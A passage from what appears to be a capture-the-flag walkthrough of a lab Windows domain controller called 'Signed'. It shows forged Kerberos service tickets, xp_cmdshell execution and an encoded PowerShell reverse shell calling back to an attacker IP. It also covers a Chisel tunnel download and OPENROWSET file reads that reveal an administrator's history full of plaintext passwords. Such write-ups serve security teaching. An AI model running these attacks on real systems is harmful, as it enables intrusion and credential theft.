oxdf@hacky$ ticketer.py -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.signed.htb:1433 -groups 1105 Administrator

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos

[*] Customizing ticket for signed.htb/Administrator

[*] PAC_LOGON_INFO

[*] PAC_CLIENT_INFO_TYPE

[*] EncTicketPart

[*] EncTGSRepPart

[*] Signing/Encrypting final ticket

[*] PAC_SERVER_CHECKSUM

[*] PAC_PRIVSVR_CHECKSUM

[*] EncTicketPart

[*] EncTGSRepPart

[*] Saving ticket in Administrator.ccache

And connect:

oxdf@hacky$ KRB5CCNAME=Administrator.ccache mssqlclient.py -no-pass -k DC01.signed.htb

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS

[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master

[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english

[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192

[*] INFO(DC01): Line 1: Changed database context to 'master'.

[*] INFO(DC01): Line 1: Changed language setting to us_english.

[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)

[!] Press help for extra shell commands

SQL (SIGNED\Administrator dbo@master)>

Right away it’s showing dbo as the user, rather than guest!

Execution / Shell

With sysadmin privileges (via the IT group membership), I can enable xp_cmdshell:

SQL (SIGNED\Administrator dbo@master)> enable_xp_cmdshell

INFO(DC01): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.

INFO(DC01): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL (SIGNED\Administrator dbo@master)> xp_cmdshell whoami

output

---------------

signed\mssqlsvc

NULL

Regardless of the user I connect to the DB as, the DB is running commands on the host as mssqlsvc. Still, that’s enough to get the user flag:

SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "dir C:\Users\mssqlsvc\Desktop"

output

--------------------------------------------------

Volume in drive C has no label.

Volume Serial Number is BED4-436E

NULL

Directory of C:\Users\mssqlsvc\Desktop

NULL

10/02/2025 08:50 AM <DIR> .

10/02/2025 08:50 AM <DIR> ..

01/30/2026 08:33 AM 34 user.txt

1 File(s) 34 bytes

2 Dir(s) 6,209,335,296 bytes free

NULL

SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "type C:\Users\mssqlsvc\Desktop\user.txt"

output

--------------------------------

3d5747bd************************

NULL



I can also pass a PowerShell rev shell from revshells.com:







SQL (SIGNED\Administrator dbo@master)> xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA2ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

It hangs, but there’s a connection at nc:

oxdf@hacky$ rlwrap -cAr nc -lnvp 443

Listening on 0.0.0.0 443

Connection received on 10.129.242.173 62457

PS C:\Windows\system32>

Many Escalations

Setup

Enumeration



This process doesn’t have any useful privileges:

PS C:\> whoami /priv

PRIVILEGES INFORMATION

----------------------

Privilege Name Description State

============================= ================================== ========

SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled

SeChangeNotifyPrivilege Bypass traverse checking Enabled

SeCreateGlobalPrivilege Create global objects Enabled

SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

It would be very common to see SeImpersonatePrivilege here, but the service must be hardened against that line of attack (I’ll abuse it anyway later).

Other than user.txt, mssqlsvc’s home directory is empty:

PS C:\users\mssqlsvc> tree /f

Folder PATH listing

Volume serial number is BED4-436E

C:.

????Desktop

? user.txt

?

????Documents

????Downloads

????Favorites

????Links

????Music

????Pictures

????Saved Games

????Videos

There are no other interesting users on the filesystem:

PS C:\users> ls

Directory: C:\users

Mode LastWriteTime Length Name

---- ------------- ------ ----

d----- 10/7/2025 2:56 AM Administrator

d----- 10/2/2025 9:27 AM mssqlsvc

d-r--- 4/10/2020 10:49 AM Public

The root of the drive is pretty empty as well:

PS C:\> ls

Directory: C:\

Mode LastWriteTime Length Name

---- ------------- ------ ----





d----- 10/7/2025 2:57 AM inetpub

d----- 10/10/2020 8:38 AM PerfLogs

d-r--- 10/6/2025 8:30 AM Program Files

d----- 10/2/2025 9:25 AM Program Files (x86)

d----- 10/2/2025 9:19 AM SQL2022

d-r--- 10/2/2025 9:27 AM Users

d----- 10/7/2025 3:05 AM Windows

inetpub is empty and SQL2022 appears empty (it’s actually just inaccessible to mssqlsvc, and it’s not interesting anyway). There aren’t any interesting installed programs.





Tunnel

For some of the escalation methods, it’ll be useful to have a proxy through the box so I can reach ports other than 1433 via its localhost. I’ll upload Chisel:

PS C:\programdata> iwr http://10.10.14.16/chisel_1.10.1_windows_amd64 -outfile c.exe

I’ll start the server on my host (./chisel_1.10.0_linux_amd64 server --reverse -p 8000) and connect:

PS C:\programdata> .\c.exe client 10.10.14.16:8000 R:socks

This hangs, but there’s a connection at the server:

2026/02/01 13:41:25 server: session#1: Client version (1.10.1) differs from server version (1.10.0)

2026/02/01 13:41:25 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

I’ll configure proxychains by making sure the end of my /etc/proxychains.conf is set up to use this:

[ProxyList]

socks5 127.0.0.1 1080
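As a quick sanity check before running tools through the tunnel, the [ProxyList] section can be parsed to confirm which proxy proxychains will actually use. This is a minimal sketch: the `Proxy` type, the `parse_proxy_list` helper, and the `SAMPLE` config text are my own illustrations, not part of proxychains.

```python
from typing import List, NamedTuple


class Proxy(NamedTuple):
    scheme: str
    host: str
    port: int


def parse_proxy_list(conf_text: str) -> List[Proxy]:
    """Return the proxies listed under [ProxyList], skipping comments and blanks."""
    proxies = []
    in_list = False
    for raw in conf_text.splitlines():
        # Drop trailing comments and surrounding whitespace.
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("["):
            # Only lines after the [ProxyList] header are proxy entries.
            in_list = line == "[ProxyList]"
            continue
        if in_list:
            fields = line.split()
            if len(fields) >= 3:
                proxies.append(Proxy(fields[0], fields[1], int(fields[2])))
    return proxies


# Hypothetical config text ending with the entry used in this post.
SAMPLE = """
strict_chain
proxy_dns
[ProxyList]
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
"""

if __name__ == "__main__":
    print(parse_proxy_list(SAMPLE))
```

If more than one entry comes back, a strict chain will try to route through all of them in order, which is a common reason a tunnel appears dead.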

Now I can access other ports, like SMB:

oxdf@hacky$ proxychains netexec smb 127.0.0.1

[proxychains] config file found: /etc/proxychains.conf

[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

[proxychains] DLL init: proxychains-ng 4.17

[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:445 ... OK

[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:445 ... OK

[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:135 ... OK

[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:135 ... OK

[proxychains] Strict chain ... 127.0.0.1:1080 ... 127.0.0.1:135 ... OK

SMB 127.0.0.1 445 DC01 Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:SIGNED.HTB) (signing:True) (SMBv1:None) (Null Auth:True)





Overview

I’ll show three ways to get Administrator or SYSTEM shells on Signed:

- Intended: mssqlsvc password -> shell as mssqlsvc -> Chisel SOCKS tunnel -> NTLM relay (ntlmrelayx to WinRM) -> shell as Administrator -> root.txt.

- Unintended: mssqlsvc password -> OPENROWSET BULK impersonation -> read files as any group -> root.txt directly, or the Administrator password -> WinRM over the Chisel tunnel -> shell as Administrator.

- Unintended: shell as mssqlsvc -> recover the network logon token (SeImpersonate restoration) -> GodPotato -> shell as SYSTEM -> root.txt.



via OPENROWSET BULK Impersonation

File Read









There’s an interesting quirk of MSSQL and its OPENROWSET where it will use the groups given to it in the authenticating service ticket if the ticket is for the account running MSSQL (so in this case mssqlsvc). I can’t find documentation for this behavior, though I confirmed it only works when the user ID of the mssqlsvc user is explicitly given (the actual username given doesn’t matter).

I’ll add two options to my ticketer.py call:

- -user-id 1103: Force the user ID to be that of mssqlsvc.

- -groups '512,1105': 1105 is IT, to get sysadmin privileges on the DB. 512 is Domain Admins, though any domain privileged group would work here, as this is what will let me access files.

I’ll craft the ticket:

oxdf@hacky$ ticketer.py -nthash ef699384c3285c54128a3ee1ddb1a0cc -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.signed.htb:1433 -user-id 1103 -groups '512,1105' doesntmatter

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos

[*] Customizing ticket for signed.htb/doesntmatter

[*] PAC_LOGON_INFO

[*] PAC_CLIENT_INFO_TYPE

[*] EncTicketPart

[*] EncTGSRepPart

[*] Signing/Encrypting final ticket

[*] PAC_SERVER_CHECKSUM

[*] PAC_PRIVSVR_CHECKSUM

[*] EncTicketPart

[*] EncTGSRepPart

[*] Saving ticket in doesntmatter.ccache
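The -groups value is a list of RIDs relative to the domain SID, so each entry corresponds to a full group SID formed by appending the RID to the domain SID. A small sketch of that arithmetic, using the values from the ticketer.py call above (the `rids_to_sids` helper name is my own):

```python
from typing import List

# Domain SID taken from the ticketer.py command line.
DOMAIN_SID = "S-1-5-21-4088429403-1159899800-2753317549"


def rids_to_sids(domain_sid: str, rids: str) -> List[str]:
    """Expand a comma-separated RID list (as passed to -groups) into full SIDs."""
    return [f"{domain_sid}-{int(rid)}" for rid in rids.split(",")]


if __name__ == "__main__":
    for sid in rids_to_sids(DOMAIN_SID, "512,1105"):
        print(sid)
```

The same expansion applies to the -user-id value, so 1103 maps to the mssqlsvc account’s SID in this domain.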

I’ll connect with it:

oxdf@hacky$ KRB5CCNAME=doesntmatter.ccache mssqlclient.py -no-pass -k DC01.signed.htb

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS

[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master

[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english

[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192

[*] INFO(DC01): Line 1: Changed database context to 'master'.

[*] INFO(DC01): Line 1: Changed language setting to us_english.

[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)

[!] Press help for extra shell commands

SQL (SIGNED\mssqlsvc dbo@master)>

I’m still dbo, and showing as the mssqlsvc account. If I try xp_cmdshell to read the root flag, it fails:

SQL (SIGNED\mssqlsvc dbo@master)> xp_cmdshell "type C:\Users\Administrator\Desktop\root.txt"

output

-----------------

Access is denied.

NULL

mssqlsvc is spawning a new cmd.exe process, and it doesn’t get the groups from the ticket. I can show this explicitly:

SQL (SIGNED\mssqlsvc dbo@master)> xp_cmdshell "whoami /groups"

output

--------------------------------------------------------------------------------

NULL

GROUP INFORMATION

-----------------

NULL

Group Name Type SID Attributes

========================================== ================ =============================================================== ==================================================

Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group

BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group

BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group

CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group

NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner

LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group

Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group

Mandatory Label\High Mandatory Level Label S-1-16-12288

NULL

But OPENROWSET with the BULK keyword can read files using those groups:

SQL (SIGNED\mssqlsvc dbo@master)> SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) AS Contents;

BulkColumn

---------------------------------------

b'2e43af1f************************\r\n'
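Since I’ll be reading several files this way, it can help to generate the query from a path. This is a minimal sketch with a hypothetical `bulk_read_query` helper; it only builds the T-SQL string shown above, doubling any single quotes in the path so the literal stays valid.

```python
def bulk_read_query(path: str) -> str:
    """Build an OPENROWSET(BULK ...) query that returns a file as one text column."""
    # T-SQL escapes a single quote inside a string literal by doubling it.
    escaped = path.replace("'", "''")
    return f"SELECT * FROM OPENROWSET(BULK '{escaped}', SINGLE_CLOB) AS Contents;"


if __name__ == "__main__":
    print(bulk_read_query(r"C:\Users\Administrator\Desktop\root.txt"))
```

The output can be pasted straight into the mssqlclient.py prompt.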

Shell

An interesting file to read is the Administrator’s PowerShell history file:

SQL (SIGNED\mssqlsvc dbo@master)> SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt', SINGLE_CLOB) AS Contents;

BulkColumn

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

b'# Domain`\n$Domain = "signed.htb"`\n`\n# Groups`\n$Groups = @("HR","IT","Finance","Developers","Support")`\n`\nforeach ($grp in $Groups) {`\n if (-not (Get-ADGroup -Filter "Name -eq \'$grp\'" -ErrorAction SilentlyContinue)) {`\n New-ADGroup -Name $grp -GroupScope Global -GroupCategory Security`\n }`\n}`\n`\n# Users: Username, Password, Group`\n$Users = @(`\n @{Username="oliver.mills"; Password="!Abc987321$"; Group="HR"},`\n @{Username="emma.clark"; Password="!Xyz654789#"; Group="HR"},`\n @{Username="liam.wright"; Password="!Qwe123789&"; Group="HR"},`\n`\n @{Username="noah.adams"; Password="!ItDev456$"; Group="IT"},`\n @{Username="ava.morris"; Password="!ItDev789#"; Group="IT"},`\n`\n @{Username="sophia.turner"; Password="!Fin987654$"; Group="Finance"},`\n @{Username="james.morgan"; Password="!Fin123987#"; Group="Finance"},`\n @{Username="mia.cooper"; Password="!Fin456321&"; Group="Finance"},`\n`\n @{Username="elijah.brooks"; Password="!Dev123456$"; Group="Developers"},`\n @{Username="isabella.evans"; Password="!Dev789654#"; Group="Developers"},`\n @{Username="lucas.murphy"; Password="!Dev321987&"; Group="Developers"},`\n @{Username="william.johnson"; Password="!ItDev321&"; Group="Developers"},`\n`\n @{Username="charlotte.price"; Password="!Sup123456$"; Group="Support"},`\n @{Username="henry.bennett"; Password="!Sup654321#"; Group="Support"},`\n @{Username="amelia.kelly"; Password="!Sup987123&"; Group="Support"},`\n @{Username="jackson.gray"; Password="!Sup321654$"; Group="Support"},`\n @{Username="harper.diaz"; Password="!Sup789321#"; Group="Support"}`\n)`\n`\nforeach ($u in $Users) {`\n if (-not (Get-ADUser -Filter "SamAccountName -eq \'$($u.Username)\'" -ErrorAction SilentlyContinue)) {`\n New-ADUser -Name $u.Username ``\n -SamAccountName $u.Username ``\n -UserPrincipalName "$($u.Username)@$Domain" ``\n -AccountPassword (ConvertTo-SecureString $u.Password -AsPlainText -Force) ``\n -Enabled $true ``\n -PasswordNeverExpires $true`\n`\n Add-ADGroupMember -Identity 
$u.Group -Members $u.Username`\n }`\n}\r\nInvoke-WebRequest -Uri "https://go.microsoft.com/fwlink/?linkid=2215202&clcid=0x409&culture=en-us&country=us" -OutFile "C:\\Windows\\Tasks\\SQL2022-SSEI-Expr.exe"\r\nC:\\Windows\\Tasks\\SQL2022-SSEI-Expr.exe\r\ncd \\\r\ndir\r\ncd .\\SQL2022\\\r\ndir\r\ncd .\\Evaluation_ENU\\\r\ndir\r\n.\\SETUP.EXE /ACTION=Install\r\nget-service -Name MSSQLSERVER\r\nNew-NetFirewallRule -DisplayName "SQL Server TCP 1433" -Direction Inbound -Protocol TCP -LocalPort 1433 -Action Allow -Profile any\r\nget-service -Name MSSQLSERVER\r\nSet-Service mssqlserver -StartupType automatic\r\nget-service -Name MSSQLSERVER\r\nStart-Service mssqlserver\r\nwhoami /all\r\nsecedit /export /cfg C:\\windows\\tasks\\cur.inf\r\nnotepad C:\\windows\\tasks\\cur.inf\r\nsecedit /configure /db C:\\Windows\\Security\\local.sdb /cfg C:\\windows\\tasks\\cur.inf /areas USER_RIGHTS\r\nsc.exe privs MSSQLSERVER SeChangeNotifyPrivilege/SeCreateGlobalPrivilege/SeIncreaseWorkingSetPrivilege/SeIncreaseQuotaPrivilege\r\nRestart-Service mssqlserver\r\n$zone = "DC=signed.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=signed,DC=htb"`\n$account = Get-ADUser mssqlsvc`\n`\n$acl = Get-ACL "AD:$zone"`\n$identity = New-Object System.Security.Principal.NTAccount($account.SamAccountName)`\n`\n$rights = [System.DirectoryServices.ActiveDirectoryRights]"GenericAll"`\n$inheritance = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All`\n$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($identity,$rights,"Allow",$inheritance)`\n`\n$acl.AddAccessRule($ace)`\nSet-ACL -ACLObject $acl "AD:$zone"\r\nEnable-PSRemoting -Force\r\n$FQDN = "dc01.signed.htb"`\n$cert = New-SelfSignedCertificate -DnsName $FQDN -CertStoreLocation Cert:\\LocalMachine\\My -KeyExportPolicy Exportable -FriendlyName "WinRM HTTPS $FQDN" -NotAfter (Get-Date).AddYears(5)`\n$thumb = ($cert.Thumbprint).Replace(" ","")`\nwinrm create winrm/config/Listener?Address=*+Transport=HTTPS 
"@{Hostname=`"$FQDN`";CertificateThumbprint=`"$thumb`"}"\r\ntry { winrm delete winrm/config/Listener?Address=*+Transport=HTTP } catch {}\r\nSet-Item -Path WSMan:\\localhost\\Client\\TrustedHosts -Value * -Force`\nnetsh advfirewall firewall add rule name="WinRM over HTTPS (5986)" dir=in action=allow protocol=TCP localport=5986`\nRestart-Service WinRM -Force\r\nnetstat -ano -p tcp\r\nwinrm enumerate winrm/config/listener\r\nwinrm get winrm/config\r\nNew-NetFirewallRule -DisplayName "Allow RDP - Any IP" ``\n -Direction Inbound ``\n -Protocol TCP ``\n -LocalPort 3389 ``\n -Action Allow ``\n -Profile Any ``\n -Enabled True ``\n -Description "Allow RDP access from any IP address (testing only)"\r\nSet-NetFirewallProfile -Profile Domain,Public,Private -DefaultInboundAction Block -DefaultOutboundAction Allow\r\nNew-NetFirewallRule -DisplayName "Allow DNS - Domain Only" ``\n -Direction Inbound ``\n -Protocol UDP ``\n -LocalPort 53 ``\n -Action Allow ``\n -Profile Any ``\n -Description "Allow DNS queries from domain network"\r\nGet-NetFirewallRule -Direction Inbound | Where-Object {$_.DisplayName -notlike "Allow *"} | Disable-NetFirewallRule\r\nNew-NetFirewallRule -DisplayName "Allow MSSQL - Any IP" ``\n -Direction Inbound ``\n -Protocol TCP ``\n -LocalPort 1433 ``\n -Action Allow ``\n -Enabled True ``\n -Profile Any ``\n -Description "Allow MSSQL access from any IP address"\r\nls \\users\\\r\ncd .\\Desktop\\\r\nnotepad root.txt\r\nnotepad C:\\Users\\mssqlsvc\\Desktop\\user.txt\r\ndir\r\ncmd /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All\r\npowershell -command \'Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true\' \r\ndir\r\ncd \\windows\\takss\r\ncd C:\\windows\\Tasks\\\r\ndir\r\ndel *\r\ndir\r\ncd \\\r\ndir\r\ncd users\r\ncd .\\Administrator\\Desktop\\\r\nnotepad cleanup.ps1\r\ncls\r\n$Action = 
New-ScheduledTaskAction -Execute "PowerShell.exe" -Argument "-ExecutionPolicy Bypass -File C:\\Users\\Administrator\\Documents\\cleanup.ps1"`\n$Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 15) -RepetitionDuration (New-TimeSpan -Days 365)`\n$Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable`\nRegister-ScheduledTask -TaskName "Clean_DNS_Task" -Action $Action -Trigger $Trigger -Settings $Settings -User "SIGNED\\Administrator" -Password "Welcome1"\r\ncd ..\\Documents\\\r\nnotepad restart.ps1\r\nexplorer .\r\ndir ..\\Desktop\\\r\nmove ..\\Desktop\\cleanup.ps1 .\r\ndir ..\\Desktop\\\r\ndir\r\nGet-NetConnectionProfile\r\nSet-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Th1s889Rabb!t" -AsPlainText -Force) -Reset\r\nSet-Service TermService -StartupType disabled\r\nexit\r\nGet-NetConnectionProfile\r\nnltest /dsgetdc:signed.htb\r\nwusa /uninstall /kb:5065428\r\niwr http://10.10.11.90:81/vmt.exe -O vmt.exe\r\niwr http://10.10.15.62:81/vmt.exe -O vmt.exe\r\n.\\vmt.exe\r\ndel .\\vmt.exe\r\nmanage-bde -off c:\\\r\ndisable-bitlocker -mountpoint c:\\\r\npowershell iwr https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2024/06/windows10.0-kb5039217-x64_bc72f4ed75c6dd7bf033b823f79533d5772769a3.msu -O update.msu\r\n.\\update.msu\r\ndel .\\update.msu\r\ndir\r\niwr https://catalog.s.download/windowsupdate.com/c/msdownload/update/software/secu/2025/05/windows10.0-kb5058392-x64_2881b28817b6e714e61b61a50de9f68605f02bd2.msu -O updates.exe\r\niwr https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2025/05/windows10.0-kb5058392-x64_2881b28817b6e714e61b61a50de9f68605f02bd2.msu -O updates.exe\r\n.\\updates.exe.exe\r\n.\\updates.exe\r\nmove .\\updates.exe .\\updates.msu\r\n.\\updates.msu\r\ndel .\\updates.msu\r\n'

This cleans up (I’ll use Python’s print function) to:

# Domain`

$Domain = "signed.htb"`

`

# Groups`

$Groups = @("HR","IT","Finance","Developers","Support")`

`

foreach ($grp in $Groups) {`

if (-not (Get-ADGroup -Filter "Name -eq '$grp'" -ErrorAction SilentlyContinue)) {`

New-ADGroup -Name $grp -GroupScope Global -GroupCategory Security`

}`

}`

`

# Users: Username, Password, Group`

$Users = @(`

@{Username="oliver.mills"; Password="!Abc987321$"; Group="HR"},`

@{Username="emma.clark"; Password="!Xyz654789#"; Group="HR"},`

@{Username="liam.wright"; Password="!Qwe123789&"; Group="HR"},`

`

@{Username="noah.adams"; Password="!ItDev456$"; Group="IT"},`

@{Username="ava.morris"; Password="!ItDev789#"; Group="IT"},`

`

@{Username="sophia.turner"; Password="!Fin987654$"; Group="Finance"},`

@{Username="james.morgan"; Password="!Fin123987#"; Group="Finance"},`

@{Username="mia.cooper"; Password="!Fin456321&"; Group="Finance"},`

`

@{Username="elijah.brooks"; Password="!Dev123456$"; Group="Developers"},`

@{Username="isabella.evans"; Password="!Dev789654#"; Group="Developers"},`

@{Username="lucas.murphy"; Password="!Dev321987&"; Group="Developers"},`

@{Username="william.johnson"; Password="!ItDev321&"; Group="Developers"},`

`

@{Username="charlotte.price"; Password="!Sup123456$"; Group="Support"},`

@{Username="henry.bennett"; Password="!Sup654321#"; Group="Support"},`

@{Username="amelia.kelly"; Password="!Sup987123&"; Group="Support"},`

@{Username="jackson.gray"; Password="!Sup321654$"; Group="Support"},`

@{Username="harper.diaz"; Password="!Sup789321#"; Group="Support"}`

)`

`

foreach ($u in $Users) {`

if (-not (Get-ADUser -Filter "SamAccountName -eq '$($u.Username)'" -ErrorAction SilentlyContinue)) {`

New-ADUser -Name $u.Username ``

-SamAccountName $u.Username ``

-UserPrincipalName "$($u.Username)@$Domain" ``

-AccountPassword (ConvertTo-SecureString $u.Password -AsPlainText -Force) ``

-Enabled $true ``

-PasswordNeverExpires $true`

`

Add-ADGroupMember -Identity $u.Group -Members $u.Username`

}`

}

Invoke-WebRequest -Uri "https://go.microsoft.com/fwlink/?linkid=2215202&clcid=0x409&culture=en-us&country=us" -OutFile "C:\Windows\Tasks\SQL2022-SSEI-Expr.exe"

C:\Windows\Tasks\SQL2022-SSEI-Expr.exe

cd \

dir

cd .\SQL2022\

dir

cd .\Evaluation_ENU\

dir

.\SETUP.EXE /ACTION=Install

get-service -Name MSSQLSERVER

New-NetFirewallRule -DisplayName "SQL Server TCP 1433" -Direction Inbound -Protocol TCP -LocalPort 1433 -Action Allow -Profile any

get-service -Name MSSQLSERVER

Set-Service mssqlserver -StartupType automatic

get-service -Name MSSQLSERVER

Start-Service mssqlserver

whoami /all

secedit /export /cfg C:\windows\tasks\cur.inf

notepad C:\windows\tasks\cur.inf

secedit /configure /db C:\Windows\Security\local.sdb /cfg C:\windows\tasks\cur.inf /areas USER_RIGHTS

sc.exe privs MSSQLSERVER SeChangeNotifyPrivilege/SeCreateGlobalPrivilege/SeIncreaseWorkingSetPrivilege/SeIncreaseQuotaPrivilege

Restart-Service mssqlserver

$zone = "DC=signed.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=signed,DC=htb"`

$account = Get-ADUser mssqlsvc`

`

$acl = Get-ACL "AD:$zone"`

$identity = New-Object System.Security.Principal.NTAccount($account.SamAccountName)`

`

$rights = [System.DirectoryServices.ActiveDirectoryRights]"GenericAll"`

$inheritance = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::All`

$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($identity,$rights,"Allow",$inheritance)`

`

$acl.AddAccessRule($ace)`

Set-ACL -ACLObject $acl "AD:$zone"

Enable-PSRemoting -Force

$FQDN = "dc01.signed.htb"`

$cert = New-SelfSignedCertificate -DnsName $FQDN -CertStoreLocation Cert:\LocalMachine\My -KeyExportPolicy Exportable -FriendlyName "WinRM HTTPS $FQDN" -NotAfter (Get-Date).AddYears(5)`

$thumb = ($cert.Thumbprint).Replace(" ","")`

winrm create winrm/config/Listener?Address=*+Transport=HTTPS "@{Hostname=`"$FQDN`";CertificateThumbprint=`"$thumb`"}"

try { winrm delete winrm/config/Listener?Address=*+Transport=HTTP } catch {}

Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value * -Force`

netsh advfirewall firewall add rule name="WinRM over HTTPS (5986)" dir=in action=allow protocol=TCP localport=5986`

Restart-Service WinRM -Force

netstat -ano -p tcp

winrm enumerate winrm/config/listener

winrm get winrm/config

New-NetFirewallRule -DisplayName "Allow RDP - Any IP" ``

-Direction Inbound ``

-Protocol TCP ``

-LocalPort 3389 ``

-Action Allow ``

-Profile Any ``

-Enabled True ``

-Description "Allow RDP access from any IP address (testing only)"

Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultInboundAction Block -DefaultOutboundAction Allow

New-NetFirewallRule -DisplayName "Allow DNS - Domain Only" ``

-Direction Inbound ``

-Protocol UDP ``

-LocalPort 53 ``

-Action Allow ``

-Profile Any ``

-Description "Allow DNS queries from domain network"

Get-NetFirewallRule -Direction Inbound | Where-Object {$_.DisplayName -notlike "Allow *"} | Disable-NetFirewallRule

New-NetFirewallRule -DisplayName "Allow MSSQL - Any IP" ``

-Direction Inbound ``

-Protocol TCP ``

-LocalPort 1433 ``

-Action Allow ``

